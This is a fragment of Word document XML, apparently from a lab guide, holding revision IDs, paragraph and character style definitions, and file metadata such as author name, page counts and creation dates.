    <w:rsid w:val="00DB06C7"/>
    <w:rsid w:val="00DB1C89"/>
    <w:rsid w:val="00DB3763"/>
    <w:rsid w:val="00DB38FB"/>
    <w:rsid w:val="00DB4029"/>
    <w:rsid w:val="00DB4D33"/>
    <w:rsid w:val="00DB4DB9"/>
    <w:rsid w:val="00DB5F4D"/>
    <w:rsid w:val="00DB66F2"/>
    <w:rsid w:val="00DB6DA5"/>
    <w:rsid w:val="00DB6F26"/>
    <w:rsid w:val="00DC076B"/>
    <w:rsid w:val="00DC186F"/>
    <w:rsid w:val="00DC252F"/>
    <w:rsid w:val="00DC3072"/>
    <w:rsid w:val="00DC6050"/>
    <w:rsid w:val="00DC6D38"/>
    <w:rsid w:val="00DC77A6"/>
    <w:rsid w:val="00DD2892"/>
    <w:rsid w:val="00DD43EA"/>
    <w:rsid w:val="00DE64DA"/>
    <w:rsid w:val="00DE6F44"/>
    <w:rsid w:val="00DF1B58"/>
    <w:rsid w:val="00DF52B2"/>
    <w:rsid w:val="00E009DA"/>
    <w:rsid w:val="00E03260"/>
    <w:rsid w:val="00E037D9"/>
    <w:rsid w:val="00E04927"/>
    <w:rsid w:val="00E06C7C"/>
    <w:rsid w:val="00E07ABD"/>
    <w:rsid w:val="00E11A48"/>
    <w:rsid w:val="00E130EB"/>
    <w:rsid w:val="00E162CD"/>
    <w:rsid w:val="00E17FA5"/>
    <w:rsid w:val="00E21BFE"/>
    <w:rsid w:val="00E26930"/>
    <w:rsid w:val="00E27257"/>
    <w:rsid w:val="00E27F4F"/>
    <w:rsid w:val="00E37DAB"/>
    <w:rsid w:val="00E40643"/>
    <w:rsid w:val="00E449D0"/>
    <w:rsid w:val="00E44A34"/>
    <w:rsid w:val="00E4506A"/>
    <w:rsid w:val="00E474E6"/>
    <w:rsid w:val="00E50E57"/>
    <w:rsid w:val="00E53F99"/>
    <w:rsid w:val="00E56510"/>
    <w:rsid w:val="00E569A2"/>
    <w:rsid w:val="00E60D5A"/>
    <w:rsid w:val="00E615BA"/>
    <w:rsid w:val="00E62EA8"/>
    <w:rsid w:val="00E671C6"/>
    <w:rsid w:val="00E67A6E"/>
    <w:rsid w:val="00E67D55"/>
    <w:rsid w:val="00E70096"/>
    <w:rsid w:val="00E71B1B"/>
    <w:rsid w:val="00E71B43"/>
    <w:rsid w:val="00E80615"/>
    <w:rsid w:val="00E81612"/>
    <w:rsid w:val="00E84B02"/>
    <w:rsid w:val="00E86377"/>
    <w:rsid w:val="00E86BF6"/>
    <w:rsid w:val="00E87C87"/>
    <w:rsid w:val="00E87D18"/>
    <w:rsid w:val="00E87D62"/>
    <w:rsid w:val="00E950D6"/>
    <w:rsid w:val="00E97333"/>
    <w:rsid w:val="00EA1C6C"/>
    <w:rsid w:val="00EA39B9"/>
    <w:rsid w:val="00EA486E"/>
    <w:rsid w:val="00EA4873"/>
    <w:rsid w:val="00EA4FA3"/>
    <w:rsid w:val="00EB001B"/>
    <w:rsid w:val="00EB035B"/>
    <w:rsid w:val="00EB3082"/>
    <w:rsid w:val="00EB496C"/>
    <w:rsid w:val="00EB6B0B"/>
    <w:rsid w:val="00EB6C33"/>
    <w:rsid w:val="00EC19C8"/>
    <w:rsid w:val="00EC36FD"/>
    <w:rsid w:val="00ED1CF4"/>
    <w:rsid w:val="00ED6019"/>
    <w:rsid w:val="00ED7830"/>
    <w:rsid w:val="00EE0A6B"/>
    <w:rsid w:val="00EE2B0C"/>
    <w:rsid w:val="00EE3909"/>
    <w:rsid w:val="00EE6F8A"/>
    <w:rsid w:val="00EE76C7"/>
    <w:rsid w:val="00EF4205"/>
    <w:rsid w:val="00EF5939"/>
    <w:rsid w:val="00EF7905"/>
    <w:rsid w:val="00F01714"/>
    <w:rsid w:val="00F01776"/>
    <w:rsid w:val="00F017C7"/>
    <w:rsid w:val="00F01C8C"/>
    <w:rsid w:val="00F0258F"/>
    <w:rsid w:val="00F02D06"/>
    <w:rsid w:val="00F04BF1"/>
    <w:rsid w:val="00F056E5"/>
    <w:rsid w:val="00F06ED5"/>
    <w:rsid w:val="00F06FDD"/>
    <w:rsid w:val="00F079F3"/>
    <w:rsid w:val="00F10819"/>
    <w:rsid w:val="00F11219"/>
    <w:rsid w:val="00F148C1"/>
    <w:rsid w:val="00F149DD"/>
    <w:rsid w:val="00F16F35"/>
    <w:rsid w:val="00F17559"/>
    <w:rsid w:val="00F177C1"/>
    <w:rsid w:val="00F2229D"/>
    <w:rsid w:val="00F25ABB"/>
    <w:rsid w:val="00F27963"/>
    <w:rsid w:val="00F27B94"/>
    <w:rsid w:val="00F27C0E"/>
    <w:rsid w:val="00F30103"/>
    <w:rsid w:val="00F30446"/>
    <w:rsid w:val="00F3100B"/>
    <w:rsid w:val="00F32D08"/>
    <w:rsid w:val="00F336F6"/>
    <w:rsid w:val="00F4135D"/>
    <w:rsid w:val="00F41F1B"/>
    <w:rsid w:val="00F46BD9"/>
    <w:rsid w:val="00F52A6A"/>
    <w:rsid w:val="00F564ED"/>
    <w:rsid w:val="00F56A8B"/>
    <w:rsid w:val="00F57911"/>
    <w:rsid w:val="00F60BE0"/>
    <w:rsid w:val="00F6280E"/>
    <w:rsid w:val="00F6569C"/>
    <w:rsid w:val="00F7050A"/>
    <w:rsid w:val="00F70643"/>
    <w:rsid w:val="00F7254A"/>
    <w:rsid w:val="00F72A70"/>
    <w:rsid w:val="00F75533"/>
    <w:rsid w:val="00F8036D"/>
    <w:rsid w:val="00F809DC"/>
    <w:rsid w:val="00F830FB"/>
    <w:rsid w:val="00F84907"/>
    <w:rsid w:val="00F86EB0"/>
    <w:rsid w:val="00F876C1"/>
    <w:rsid w:val="00F963E6"/>
    <w:rsid w:val="00FA2AD2"/>
    <w:rsid w:val="00FA3811"/>
    <w:rsid w:val="00FA3B9F"/>
    <w:rsid w:val="00FA3F06"/>
    <w:rsid w:val="00FA4A26"/>
    <w:rsid w:val="00FA4C20"/>
    <w:rsid w:val="00FA6F1E"/>
    <w:rsid w:val="00FA7084"/>
    <w:rsid w:val="00FA79A2"/>
    <w:rsid w:val="00FA7BEF"/>
    <w:rsid w:val="00FB1105"/>
    <w:rsid w:val="00FB1929"/>
    <w:rsid w:val="00FB5C75"/>
    <w:rsid w:val="00FB5FD9"/>
    <w:rsid w:val="00FB749C"/>
    <w:rsid w:val="00FC08AE"/>
    <w:rsid w:val="00FC6F5E"/>
    <w:rsid w:val="00FC7F5F"/>
    <w:rsid w:val="00FD0323"/>
    <w:rsid w:val="00FD33AB"/>
    <w:rsid w:val="00FD4724"/>
    <w:rsid w:val="00FD4A68"/>
    <w:rsid w:val="00FD4EEF"/>
    <w:rsid w:val="00FD68ED"/>
    <w:rsid w:val="00FD7E00"/>
    <w:rsid w:val="00FD7E66"/>
    <w:rsid w:val="00FE2824"/>
    <w:rsid w:val="00FE2F0E"/>
    <w:rsid w:val="00FE326F"/>
    <w:rsid w:val="00FE661F"/>
    <w:rsid w:val="00FF018A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BC75"/>
  <w15:docId w15:val="{B011124F-73B1-264C-AD47-E85D220D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3"/>
    <w:next w:val="a"/>
    <w:qFormat/>
    <w:rsid w:val="00A239A4"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:spacing w:before="240"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:iCs/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="LabTitle">
    <w:name w:val="Lab Title"/>
    <w:basedOn w:val="a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603C52"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="11"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:color w:val="auto"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a5"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008402F2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rsid w:val="008402F2"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a6">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a7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7">
    <w:name w:val="Нижний колонтитул Знак"/>
    <w:link w:val="a6"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00163164"/>
    <w:rPr>
      <w:sz w:val="16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a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rsid w:val="008402F2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012C22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numId w:val="0"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="935"/>
      </w:tabs>
      <w:ind w:left="935" w:hanging="935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3">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="afc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3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a3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character" w:styleId="afd">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0002463E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0246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D0BC7"/>
    <w:rPr>
      <w:color w:val="808080"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="afe">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DC6D38"/>
    <w:rPr>
      <w:color w:val="800080" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aff">
    <w:name w:val="Revision"/>
    <w:hidden/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00AA6BB2"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="UnresolvedMention2">
    <w:name w:val="Unresolved Mention2"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0063008A"/>
    <w:rPr>
      <w:color w:val="808080"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="aff0">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00500A49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unhideWhenUsed/>
    <w:rsid w:val="00D270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2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nalyst@209.165.200.226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4D7F-5121-4275-B6AE-97EE0E35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4</Pages>
  <Words>4745</Words>
  <Characters>27051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rtem Gromov</cp:lastModifiedBy>
  <cp:revision>15</cp:revision>
  <cp:lastPrinted>2017-09-04T14:26:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-06-18T20:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-16T10:24:00Z</dcterms:modified>
</cp:coreProperties>
</file>